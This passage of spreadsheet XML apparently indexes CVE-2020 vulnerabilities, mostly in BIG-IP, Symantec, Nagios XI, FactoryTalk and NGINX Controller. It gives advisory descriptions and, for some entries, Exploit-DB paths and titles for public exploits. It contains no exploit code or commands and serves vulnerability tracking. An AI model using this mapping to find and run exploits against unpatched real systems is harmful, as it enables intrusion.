    <t>Relative Path Traversal in Teltonika firmware TRB2_R_00.02.04.3 allows a remote, authenticated attacker to delete arbitrary files on disk via the admin/system/admin/certificates/delete action.</t>
  </si>
  <si>
    <t>CVE-2020-5789</t>
  </si>
  <si>
    <t>Relative Path Traversal in Teltonika firmware TRB2_R_00.02.04.3 allows a remote, authenticated attacker to read the contents of arbitrary files on disk.</t>
  </si>
  <si>
    <t>CVE-2020-5790</t>
  </si>
  <si>
    <t>Cross-site request forgery in Nagios XI 5.7.3 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-5791</t>
  </si>
  <si>
    <t>Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48959.py</t>
  </si>
  <si>
    <t>Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)</t>
  </si>
  <si>
    <t>2020-10-28</t>
  </si>
  <si>
    <t>CVE-2020-5792</t>
  </si>
  <si>
    <t>Improper neutralization of argument delimiters in a command in Nagios XI 5.7.3 allows a remote, authenticated admin user to write to arbitrary files and ultimately execute code with the privileges of the apache user.</t>
  </si>
  <si>
    <t>CVE-2020-5793</t>
  </si>
  <si>
    <t>A vulnerability in Nessus versions 8.9.0 through 8.12.0 for Windows &amp; Nessus Agent 8.0.0 and 8.1.0 for Windows could allow an authenticated local attacker to copy user-supplied files to a specially constructed path in a specifically named user directory. An attacker could exploit this vulnerability by creating a malicious file and copying the file to a system directory. The attacker needs valid credentials on the Windows system to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5794</t>
  </si>
  <si>
    <t>A vulnerability in Nessus Network Monitor versions 5.11.0, 5.11.1, and 5.12.0 for Windows could allow an authenticated local attacker to execute arbitrary code by copying user-supplied files to a specially constructed path in a specifically named user directory. The attacker needs valid credentials on the Windows system to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5795</t>
  </si>
  <si>
    <t>UNIX Symbolic Link (Symlink) Following in TP-Link Archer A7(US)_V5_200721 allows an authenticated admin user, with physical access and network access, to execute arbitrary code after plugging a crafted USB drive into the router.</t>
  </si>
  <si>
    <t>CVE-2020-5796</t>
  </si>
  <si>
    <t>Improper preservation of permissions in Nagios XI 5.7.4 allows a local, low-privileged, authenticated user to weaken the permissions of files, resulting in low-privileged users being able to write to and execute arbitrary PHP code with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5797</t>
  </si>
  <si>
    <t>UNIX Symbolic Link (Symlink) Following in TP-Link Archer C9(US)_V1_180125 firmware allows an unauthenticated actor, with physical access and network access, to read sensitive files and write to a limited set of files after plugging a crafted USB drive into the router.</t>
  </si>
  <si>
    <t>CVE-2020-5798</t>
  </si>
  <si>
    <t>inSync Client installer for macOS versions v6.8.0 and prior could allow an attacker to gain privileges of a root user from a lower privileged user due to improper integrity checks and directory permissions.</t>
  </si>
  <si>
    <t>CVE-2020-5799</t>
  </si>
  <si>
    <t>The Eat Spray Love mobile app for both iOS and Android contains a backdoor account that, when modified, allowed privileged access to restricted functionality and to other users' data.</t>
  </si>
  <si>
    <t>CVE-2020-5800</t>
  </si>
  <si>
    <t>The Eat Spray Love mobile app for both iOS and Android contains logic that allows users to bypass authentication and retrieve or modify information that they would not normally have access to.</t>
  </si>
  <si>
    <t>CVE-2020-5801</t>
  </si>
  <si>
    <t>An attacker can craft and send an OpenNamespace message to port 4241 with valid session-id that triggers an unhandled exception in CFTLDManager::HandleRequest function in RnaDaSvr.dll, resulting in process termination. Observed in FactoryTalk Linx 6.11. All versions of FactoryTalk Linx are affected.</t>
  </si>
  <si>
    <t>CVE-2020-5802</t>
  </si>
  <si>
    <t>An attacker-controlled memory allocation size can be passed to the C++ new operator in RnaDaSvr.dll by sending a specially crafted ConfigureItems message to TCP port 4241. This will cause an unhandled exception, resulting in termination of RSLinxNG.exe. Observed in FactoryTalk 6.11. All versions of FactoryTalk Linx are affected.</t>
  </si>
  <si>
    <t>CVE-2020-5803</t>
  </si>
  <si>
    <t>Relative Path Traversal in Marvell QConvergeConsole GUI 5.5.0.74 allows a remote, authenticated attacker to delete arbitrary files on disk as SYSTEM or root.</t>
  </si>
  <si>
    <t>CVE-2020-5804</t>
  </si>
  <si>
    <t>Marvell QConvergeConsole GUI &lt;= 5.5.0.74 is affected by a path traversal vulnerability. The deleteEventLogFile method of the GWTTestServiceImpl class lacks proper validation of a user-supplied path prior to using it in file deletion operations. An authenticated, remote attacker can leverage this vulnerability to delete arbitrary remote files as SYSTEM or root.</t>
  </si>
  <si>
    <t>CVE-2020-5805</t>
  </si>
  <si>
    <t>In Marvell QConvergeConsole GUI &lt;= 5.5.0.74, credentials are stored in cleartext in tomcat-users.xml. OS-level users on the QCC host who are not authorized to use QCC may use the plaintext credentials to login to QCC.</t>
  </si>
  <si>
    <t>CVE-2020-5806</t>
  </si>
  <si>
    <t>An attacker-controlled memory allocation size can be passed to the C++ new operator in the CServerManager::HandleBrowseLoadIconStreamRequest in messaging.dll. This can be done by sending a specially crafted message to 127.0.0.1:7153. Observed in FactoryTalk Linx 6.11. All versions of FactoryTalk Linx are affected.</t>
  </si>
  <si>
    <t>CVE-2020-5807</t>
  </si>
  <si>
    <t>An unauthenticated remote attacker can send data to RsvcHost.exe listening on TCP port 5241 to add entries in the FactoryTalk Diagnostics event log. The attacker can specify long fields in the log entry, which can cause an unhandled exception in wcscpy_s() if a local user opens FactoryTalk Diagnostics Viewer (FTDiagViewer.exe) to view the log entry. Observed in FactoryTalk Diagnostics 6.11. All versions of FactoryTalk Diagnostics are affected.</t>
  </si>
  <si>
    <t>CVE-2020-5808</t>
  </si>
  <si>
    <t>In certain scenarios in Tenable.sc prior to 5.17.0, a scanner could potentially be used outside the user's defined scan zone without a particular zone being specified within the Automatic Distribution configuration.</t>
  </si>
  <si>
    <t>CVE-2020-5809</t>
  </si>
  <si>
    <t>A stored XSS vulnerability exists in Umbraco CMS &lt;= 8.9.1 or current. An authenticated user can inject arbitrary JavaScript code into iframes when editing content using the TinyMCE rich-text editor, as TinyMCE is configured to allow iframes by default in Umbraco CMS.</t>
  </si>
  <si>
    <t>CVE-2020-5810</t>
  </si>
  <si>
    <t>A stored XSS vulnerability exists in Umbraco CMS &lt;= 8.9.1 or current. An authenticated user authorized to upload media can upload a malicious .svg file which act as a stored XSS payload.</t>
  </si>
  <si>
    <t>CVE-2020-5811</t>
  </si>
  <si>
    <t>An authenticated path traversal vulnerability exists during package installation in Umbraco CMS &lt;= 8.9.1 or current, which could result in arbitrary files being written outside of the site home and expected paths when installing an Umbraco package.</t>
  </si>
  <si>
    <t>exploits/aspx/webapps/50241.py</t>
  </si>
  <si>
    <t>Umbraco CMS 8.9.1 - Directory Traversal</t>
  </si>
  <si>
    <t>2021-08-31</t>
  </si>
  <si>
    <t>CVE-2020-5812</t>
  </si>
  <si>
    <t>Nessus AMI versions 8.12.0 and earlier were found to either not validate, or incorrectly validate, a certificate which could allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack.</t>
  </si>
  <si>
    <t>CVE-2020-5820</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection (SEP) and Symantec Endpoint Protection Small Business Edition (SEP SBE), prior to 14.2 RU2 MP1 and prior to 14.2.5569.2100 respectively, may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.</t>
  </si>
  <si>
    <t>CVE-2020-5821</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection (SEP) and Symantec Endpoint Protection Small Business Edition (SEP SBE), prior to 14.2 RU2 MP1 and prior to 14.2.5569.2100 respectively, may be susceptible to a DLL injection vulnerability, which is a type of issue whereby an individual attempts to execute their own code in place of legitimate code as a means to perform an exploit.</t>
  </si>
  <si>
    <t>CVE-2020-5822</t>
  </si>
  <si>
    <t>CVE-2020-5823</t>
  </si>
  <si>
    <t>CVE-2020-5824</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection (SEP) and Symantec Endpoint Protection Small Business Edition (SEP SBE), prior to 14.2 RU2 MP1 and prior to 14.2.5569.2100 respectively, may be susceptible to a denial of service vulnerability, which is a type of issue whereby a threat actor attempts to tie up the resources of a resident application, thereby making certain functions unavailable.</t>
  </si>
  <si>
    <t>CVE-2020-5825</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection (SEP) and Symantec Endpoint Protection Small Business Edition (SEP SBE), prior to 14.2 RU2 MP1 and prior to 14.2.5569.2100 respectively, may be susceptible to an arbitrary file write vulnerability, which is a type of issue whereby an attacker is able to overwrite existing files on the resident system without proper privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5826</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection (SEP) and Symantec Endpoint Protection Small Business Edition (SEP SBE), prior to 14.2 RU2 MP1 and prior to 14.2.5569.2100 respectively, may be susceptible to an out of bounds vulnerability, which is a type of issue that results in an existing application reading memory outside of the bounds of the memory that had been allocated to the program.</t>
  </si>
  <si>
    <t>CVE-2020-5827</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection Manager (SEPM), prior to 14.2 RU2 MP1, may be susceptible to an out of bounds vulnerability, which is a type of issue that results in an existing application reading memory outside of the bounds of the memory that had been allocated to the program.</t>
  </si>
  <si>
    <t>CVE-2020-5828</t>
  </si>
  <si>
    <t>CVE-2020-5829</t>
  </si>
  <si>
    <t>CVE-2020-5830</t>
  </si>
  <si>
    <t>CVE-2020-5831</t>
  </si>
  <si>
    <t>CVE-2020-5832</t>
  </si>
  <si>
    <t>Symantec Data Center Security Manager Component, prior to 6.8.2 (aka 6.8 MP2), may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.</t>
  </si>
  <si>
    <t>CVE-2020-5833</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection Manager, prior to 14.3, may be susceptible to an out of bounds vulnerability, which is a type of issue that results in an existing application reading memory outside of the bounds of the memory that had been allocated to the program.</t>
  </si>
  <si>
    <t>CVE-2020-5834</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection Manager, prior to 14.3, may be susceptible to a directory traversal attack that could allow a remote actor to determine the size of files in the directory.</t>
  </si>
  <si>
    <t>CVE-2020-5835</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection Manager, prior to 14.3, has a race condition in client remote deployment which may result in an elevation of privilege on the remote machine.</t>
  </si>
  <si>
    <t>CVE-2020-5836</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection, prior to 14.3, can potentially reset the ACLs on a file as a limited user while Symantec Endpoint Protection's Tamper Protection feature is disabled.</t>
  </si>
  <si>
    <t>CVE-2020-5837</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection, prior to 14.3, may not respect file permissions when writing to log files that are replaced by symbolic links, which can lead to a potential elevation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-5838</t>
  </si>
  <si>
    <t>Symantec IT Analytics, prior to 2.9.1, may be susceptible to a cross-site scripting (XSS) exploit, which is a type of issue that can potentially enable attackers to inject client-side scripts into web pages viewed by other users.</t>
  </si>
  <si>
    <t>CVE-2020-5839</t>
  </si>
  <si>
    <t>Symantec Endpoint Detection And Response, prior to 4.4, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.</t>
  </si>
  <si>
    <t>CVE-2020-5840</t>
  </si>
  <si>
    <t>An issue was discovered in HashBrown CMS before 1.3.2. Server/Entity/Resource/Connection.js allows an attacker to reach a parent directory via a crafted name or ID field.</t>
  </si>
  <si>
    <t>CVE-2020-5841</t>
  </si>
  <si>
    <t>An issue was discovered in OpServices OpMon 9.3.1-1. Using password change parameters, an attacker could perform SQL injection without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-5842</t>
  </si>
  <si>
    <t>Codoforum 4.8.3 allows XSS in the user registration page: via the username field to the index.php?u=/user/register URI. The payload is, for example, executed on the admin/index.php?page=users/manage page.</t>
  </si>
  <si>
    <t>CVE-2020-5843</t>
  </si>
  <si>
    <t>Codoforum 4.8.3 allows XSS in the admin dashboard via a category to the Manage Users screen.</t>
  </si>
  <si>
    <t>CVE-2020-5844</t>
  </si>
  <si>
    <t>index.php?sec=godmode/extensions&amp;sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50961.py</t>
  </si>
  <si>
    <t>Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)</t>
  </si>
  <si>
    <t>2022-06-14</t>
  </si>
  <si>
    <t>CVE-2020-5846</t>
  </si>
  <si>
    <t>An insecure file upload and code execution issue was discovered in Ahsay Cloud Backup Suite 8.3.0.30 via a "PUT /obs/obm7/file/upload" request with the base64-encoded pathname in the X-RSW-custom-encode-path HTTP header, and the content in the HTTP request body. It is possible to upload a file into any directory of the server. One can insert a JSP shell into the web server's directory and execute it. This leads to full system access as the configured user (e.g., Administrator) when starting from any authenticated session (e.g., a trial account). This is fixed in the 83/830122/cbs-*-hotfix-task26000 builds.</t>
  </si>
  <si>
    <t>CVE-2020-5847</t>
  </si>
  <si>
    <t>Unraid through 6.8.0 allows Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-5849</t>
  </si>
  <si>
    <t>Unraid 6.8.0 allows authentication bypass.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48353.rb</t>
  </si>
  <si>
    <t>Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)</t>
  </si>
  <si>
    <t>2020-04-20</t>
  </si>
  <si>
    <t>CVE-2020-5851</t>
  </si>
  <si>
    <t>On impacted versions and platforms the Trusted Platform Module (TPM) system integrity check cannot detect modifications to specific system components. This issue only impacts specific engineering hotfixes and platforms. NOTE: This vulnerability does not affect any of the BIG-IP major, minor or maintenance releases you obtained from downloads.f5.com. The affected Engineering Hotfix builds are as follows: Hotfix-BIGIP-14.1.0.2.0.45.4-ENG Hotfix-BIGIP-14.1.0.2.0.62.4-ENG</t>
  </si>
  <si>
    <t>CVE-2020-5852</t>
  </si>
  <si>
    <t>Undisclosed traffic patterns received may cause a disruption of service to the Traffic Management Microkernel (TMM). This vulnerability affects TMM through a virtual server configured with a FastL4 profile. Traffic processing is disrupted while TMM restarts. This issue only impacts specific engineering hotfixes. NOTE: This vulnerability does not affect any of the BIG-IP major, minor or maintenance releases you obtained from downloads.f5.com. The affected Engineering Hotfix builds are as follows: Hotfix-BIGIP-14.1.2.1.0.83.4-ENG Hotfix-BIGIP-12.1.4.1.0.97.6-ENG Hotfix-BIGIP-11.5.4.2.74.291-HF2</t>
  </si>
  <si>
    <t>CVE-2020-5853</t>
  </si>
  <si>
    <t>In BIG-IP APM portal access on versions 15.0.0-15.1.0, 14.0.0-14.1.2.3, 13.1.0-13.1.3.2, 12.1.0-12.1.5, and 11.5.2-11.6.5.1, when backend servers serve HTTP pages with special JavaScript code, this can lead to internal portal access name conflict.</t>
  </si>
  <si>
    <t>CVE-2020-5854</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1.1, 14.1.0-14.1.2.2, 14.0.0-14.0.1, 13.1.0-13.1.3.1, 12.1.0-12.1.5, and 11.6.0-11.6.5.1, the tmm crashes under certain circumstances when using the connector profile if a specific sequence of connections are made.</t>
  </si>
  <si>
    <t>CVE-2020-5855</t>
  </si>
  <si>
    <t>When the Windows Logon Integration feature is configured for all versions of BIG-IP Edge Client for Windows, unauthorized users who have physical access to an authorized user's machine can get shell access under unprivileged user.</t>
  </si>
  <si>
    <t>CVE-2020-5856</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1.1 and 14.1.0-14.1.2.2, while processing specifically crafted traffic using the default 'xnet' driver, Virtual Edition instances hosted in Amazon Web Services (AWS) may experience a TMM restart.</t>
  </si>
  <si>
    <t>CVE-2020-5857</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1, 14.1.0-14.1.2.2, 13.1.0-13.1.3.1, 12.1.0-12.1.5, and 11.5.2-11.6.5.1, undisclosed HTTP behavior may lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5858</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1.2, 14.1.0-14.1.2.2, 13.1.0-13.1.3.2, 12.1.0-12.1.5, and 11.5.2-11.6.5.1 and BIG-IQ 7.0.0, 6.0.0-6.1.0, and 5.2.0-5.4.0, users with non-administrator roles (for example, Guest or Resource Administrator) with tmsh shell access can execute arbitrary commands with elevated privilege via a crafted tmsh command.</t>
  </si>
  <si>
    <t>CVE-2020-5859</t>
  </si>
  <si>
    <t>On BIG-IP 15.1.0.1, specially formatted HTTP/3 messages may cause TMM to produce a core file.</t>
  </si>
  <si>
    <t>CVE-2020-5860</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.1.0.2, 14.1.0-14.1.2.3, 13.1.0-13.1.3.2, 12.1.0-12.1.5.1, and 11.5.2-11.6.5.1 and BIG-IQ 7.0.0, 6.0.0-6.1.0, and 5.2.0-5.4.0, in a High Availability (HA) network failover in Device Service Cluster (DSC), the failover service does not require a strong form of authentication and HA network failover traffic is not encrypted by Transport Layer Security (TLS).</t>
  </si>
  <si>
    <t>CVE-2020-5861</t>
  </si>
  <si>
    <t>On BIG-IP 12.1.0-12.1.5, the TMM process may produce a core file in some cases when Ram Cache incorrectly optimizes stored data resulting in memory errors.</t>
  </si>
  <si>
    <t>CVE-2020-5862</t>
  </si>
  <si>
    <t>On BIG-IP 15.1.0-15.1.0.1, 15.0.0-15.0.1.1, and 14.1.0-14.1.2.2, under certain conditions, TMM may crash or stop processing new traffic with the DPDK/ENA driver on AWS systems while sending traffic. This issue does not affect any other platforms, hardware or virtual, or any other cloud provider since the affected driver is specific to AWS.</t>
  </si>
  <si>
    <t>CVE-2020-5863</t>
  </si>
  <si>
    <t>In NGINX Controller versions prior to 3.2.0, an unauthenticated attacker with network access to the Controller API can create unprivileged user accounts. The user which is created is only able to upload a new license to the system but cannot view or modify any other components of the system.</t>
  </si>
  <si>
    <t>CVE-2020-5864</t>
  </si>
  <si>
    <t>In versions of NGINX Controller prior to 3.2.0, communication between NGINX Controller and NGINX Plus instances skip TLS verification by default.</t>
  </si>
  <si>
    <t>CVE-2020-5865</t>
  </si>
  <si>
    <t>In versions prior to 3.3.0, the NGINX Controller is configured to communicate with its Postgres database server over unencrypted channels, making the communicated data vulnerable to interception via man-in-the-middle (MiTM) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-5866</t>
  </si>
  <si>
    <t>In versions of NGINX Controller prior to 3.3.0, the helper.sh script, which is used optionally in NGINX Controller to change settings, uses sensitive items as command-line arguments.</t>
  </si>
  <si>
    <t>CVE-2020-5867</t>
  </si>
  <si>
    <t>In versions prior to 3.3.0, the NGINX Controller Agent installer script 'install.sh' uses HTTP instead of HTTPS to check and install packages</t>
  </si>
  <si>
    <t>CVE-2020-5868</t>
  </si>
  <si>
    <t>In BIG-IQ 6.0.0-7.0.0, a remote access vulnerability has been discovered that may allow a remote user to execute shell commands on affected systems using HTTP requests to the BIG-IQ user interface.</t>
  </si>
  <si>
    <t>CVE-2020-5869</t>
  </si>
  <si>
    <t>In BIG-IQ 5.2.0-7.0.0, high availability (HA) synchronization is not secure by TLS and may allow on-path attackers to read / modify confidential data in transit.</t>
  </si>
  <si>
    <t>CVE-2020-5870</t>
  </si>
  <si>
    <t>In BIG-IQ 5.2.0-7.0.0, high availability (HA) synchronization mechanisms do not use any form of authentication for connecting to the peer.</t>
  </si>
  <si>
    <t>CVE-2020-5871</t>
  </si>
  <si>
    <t>On BIG-IP 14.1.0-14.1.2.3, undisclosed requests can lead to a denial of service (DoS) when sent to BIG-IP HTTP/2 virtual servers. The problem can occur when ciphers, which have been blacklisted by the HTTP/2 RFC, are used on backend servers. This is a data-plane issue. There is no control-plane exposure.</t>
  </si>
  <si>
    <t>CVE-2020-5872</t>
  </si>
  <si>
    <t>On BIG-IP 14.1.0-14.1.2.3, 14.0.0-14.0.1, 13.1.0-13.1.3.1, and 12.1.0-12.1.4.1, when processing TLS traffic with hardware cryptographic acceleration enabled on platforms with Intel QAT hardware, the Traffic Management Microkernel (TMM) may stop responding and cause a failover event.</t>
  </si>
  <si>
    <t>CVE-2020-5873</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1, 14.1.0-14.1.2.3, 13.1.0-13.1.3.1, 12.1.0-12.1.5, and 11.6.1-11.6.5 and BIG-IQ 5.2.0-7.1.0, a user associated with the Resource Administrator role who has access to the secure copy (scp) utility but does not have access to Advanced Shell (bash) can execute arbitrary commands using a maliciously crafted scp request.</t>
  </si>
  <si>
    <t>CVE-2020-5874</t>
  </si>
  <si>
    <t>On BIG-IP APM 15.0.0-15.0.1.2, 14.1.0-14.1.2.3, and 14.0.0-14.0.1, in certain circumstances, an attacker sending specifically crafted requests to a BIG-IP APM virtual server may cause a disruption of service provided by the Traffic Management Microkernel(TMM).</t>
  </si>
  <si>
    <t>CVE-2020-5875</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1 and 14.1.0-14.1.2.3, under certain conditions, the Traffic Management Microkernel (TMM) may generate a core file and restart while processing SSL traffic with an HTTP/2 full proxy.</t>
  </si>
  <si>
    <t>CVE-2020-5876</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, a race condition exists where mcpd and other processes may make unencrypted connection attempts to a new configuration sync peer. The race condition can occur when changing the ConfigSync IP address of a peer, adding a new peer, or when the Traffic Management Microkernel (TMM) first starts up.</t>
  </si>
  <si>
    <t>CVE-2020-5877</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.1.0.1, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, malformed input to the DATAGRAM::tcp iRules command within a FLOW_INIT event may lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5878</t>
  </si>
  <si>
    <t>On versions 15.1.0-15.1.0.1, 15.0.0-15.0.1.1, and 14.1.0-14.1.2.3, Traffic Management Microkernel (TMM) may restart on BIG-IP Virtual Edition (VE) while processing unusual IP traffic.</t>
  </si>
  <si>
    <t>CVE-2020-5879</t>
  </si>
  <si>
    <t>On BIG-IP ASM 11.6.1-11.6.5.1, under certain configurations, the BIG-IP system sends data plane traffic to back-end servers unencrypted, even when a Server SSL profile is applied.</t>
  </si>
  <si>
    <t>CVE-2020-5880</t>
  </si>
  <si>
    <t>Om BIG-IP 15.0.0-15.0.1.3 and 14.1.0-14.1.2.3, the restjavad process may expose a way for attackers to upload arbitrary files on the BIG-IP system, bypassing the authorization system. Resulting error messages may also reveal internal paths of the server.</t>
  </si>
  <si>
    <t>CVE-2020-5881</t>
  </si>
  <si>
    <t>On versions 15.0.0-15.1.0.1, 14.1.0-14.1.2.3, and 13.1.0-13.1.3.3, when the BIG-IP Virtual Edition (VE) is configured with VLAN groups and there are devices configured with OSPF connected to it, the Network Device Abstraction Layer (NDAL) Interfaces can lock up and in turn disrupting the communication between the mcpd and tmm processes.</t>
  </si>
  <si>
    <t>CVE-2020-5882</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5, and 11.6.1-11.6.5.1, under certain conditions, the Intel QuickAssist Technology (QAT) cryptography driver may produce a Traffic Management Microkernel (TMM) core file.</t>
  </si>
  <si>
    <t>CVE-2020-5883</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1, 14.1.0-14.1.2.3, 14.0.0-14.0.1, and 13.1.0-13.1.3.1, when a virtual server is configured with HTTP explicit proxy and has an attached HTTP_PROXY_REQUEST iRule, POST requests sent to the virtual server cause an xdata memory leak.</t>
  </si>
  <si>
    <t>CVE-2020-5884</t>
  </si>
  <si>
    <t>On versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.4, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the default deployment mode for BIG-IP high availability (HA) pair mirroring is insecure. This is a control plane issue that is exposed only on the network used for mirroring.</t>
  </si>
  <si>
    <t>CVE-2020-5885</t>
  </si>
  <si>
    <t>On versions 15.0.0-15.1.0.1, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, and 12.1.0-12.1.5.1, BIG-IP systems set up for connection mirroring in a high availability (HA) pair transfer sensitive cryptographic objects over an insecure communications channel. This is a control plane issue which is exposed only on the network used for connection mirroring.</t>
  </si>
  <si>
    <t>CVE-2020-5886</t>
  </si>
  <si>
    <t>On versions 15.0.0-15.1.0.1, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, and 12.1.0-12.1.5.1, BIG-IP systems setup for connection mirroring in a High Availability (HA) pair transfers sensitive cryptographic objects over an insecure communications channel. This is a control plane issue which is exposed only on the network used for connection mirroring.</t>
  </si>
  <si>
    <t>CVE-2020-5887</t>
  </si>
  <si>
    <t>On versions 15.1.0-15.1.0.1, 15.0.0-15.0.1.2, and 14.1.0-14.1.2.3, BIG-IP Virtual Edition (VE) may expose a mechanism for remote attackers to access local daemons and bypass port lockdown settings.</t>
  </si>
  <si>
    <t>CVE-2020-5888</t>
  </si>
  <si>
    <t>On versions 15.1.0-15.1.0.1, 15.0.0-15.0.1.2, and 14.1.0-14.1.2.3, BIG-IP Virtual Edition (VE) may expose a mechanism for adjacent network (layer 2) attackers to access local daemons and bypass port lockdown settings.</t>
  </si>
  <si>
    <t>CVE-2020-5889</t>
  </si>
  <si>
    <t>On versions 15.1.0-15.1.0.1, 15.0.0-15.0.1.2, and 14.1.0-14.1.2.3, in BIG-IP APM portal access, a specially crafted HTTP request can lead to reflected XSS after the BIG-IP APM system rewrites the HTTP response from the untrusted backend server and sends it to the client.</t>
  </si>
  <si>
    <t>CVE-2020-5890</t>
  </si>
  <si>
    <t>On BIG-IP 15.0.0-15.0.1, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, and 12.1.0-12.1.5.1 and BIG-IQ 5.2.0-7.1.0, when creating a QKView, credentials for binding to LDAP servers used for remote authentication of the BIG-IP administrative interface will not fully obfuscate if they contain whitespace.</t>
  </si>
  <si>
    <t>CVE-2020-5891</t>
  </si>
  <si>
    <t>On BIG-IP 15.1.0-15.1.0.1, 15.0.0-15.0.1.2, and 14.1.0-14.1.2.3, undisclosed HTTP/2 requests can lead to a denial of service when sent to a virtual server configured with the Fallback Host setting and a server-side HTTP/2 profile.</t>
  </si>
  <si>
    <t>CVE-2020-5892</t>
  </si>
  <si>
    <t>In versions 7.1.5-7.1.8, the BIG-IP Edge Client components in BIG-IP APM, Edge Gateway, and FirePass legacy allow attackers to obtain the full session ID from process memory.</t>
  </si>
  <si>
    <t>CVE-2020-5893</t>
  </si>
  <si>
    <t>In versions 7.1.5-7.1.8, when a user connects to a VPN using BIG-IP Edge Client over an unsecure network, BIG-IP Edge Client responds to authentication requests over HTTP while sending probes for captive portal detection.</t>
  </si>
  <si>
    <t>CVE-2020-5894</t>
  </si>
  <si>
    <t>On versions 3.0.0-3.3.0, the NGINX Controller webserver does not invalidate the server-side session token after users log out.</t>
  </si>
  <si>
    <t>CVE-2020-5895</t>
  </si>
  <si>
    <t>On NGINX Controller versions 3.1.0-3.3.0, AVRD uses world-readable and world-writable permissions on its socket, which allows processes or users on the local system to write arbitrary data into the socket. A local system attacker can make AVRD segmentation fault (SIGSEGV) by writing malformed messages to the socket.</t>
  </si>
  <si>
    <t>CVE-2020-5896</t>
  </si>
  <si>
    <t>On versions 7.1.5-7.1.9, the BIG-IP Edge Client's Windows Installer Service's temporary folder has weak file and folder permissions.</t>
  </si>
  <si>
    <t>CVE-2020-5897</t>
  </si>
  <si>
    <t>In versions 7.1.5-7.1.9, there is use-after-free memory vulnerability in the BIG-IP Edge Client Windows ActiveX component.</t>
  </si>
  <si>
    <t>CVE-2020-5898</t>
  </si>
  <si>
    <t>In versions 7.1.5-7.1.9, BIG-IP Edge Client Windows Stonewall driver does not sanitize the pointer received from the userland. A local user on the Windows client system can send crafted DeviceIoControl requests to \\.\urvpndrv device causing the Windows kernel to crash.</t>
  </si>
  <si>
    <t>CVE-2020-5899</t>
  </si>
  <si>
    <t>In NGINX Controller 3.0.0-3.4.0, recovery code required to change a user's password is transmitted and stored in the database in plain text, which allows an attacker who can intercept the database connection or have read access to the database, to request a password reset using the email address of another registered user then retrieve the recovery code.</t>
  </si>
  <si>
    <t>CVE-2020-5900</t>
  </si>
  <si>
    <t>In versions 3.0.0-3.4.0, 2.0.0-2.9.0, and 1.0.1, there is insufficient cross-site request forgery (CSRF) protections for the NGINX Controller user interface.</t>
  </si>
  <si>
    <t>CVE-2020-5901</t>
  </si>
  <si>
    <t>In NGINX Controller 3.3.0-3.4.0, undisclosed API endpoints may allow for a reflected Cross Site Scripting (XSS) attack. If the victim user is logged in as admin this could result in a complete compromise of the system.</t>
  </si>
  <si>
    <t>CVE-2020-5902</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.</t>
  </si>
  <si>
    <t>exploits/linux/webapps/48643.txt</t>
  </si>
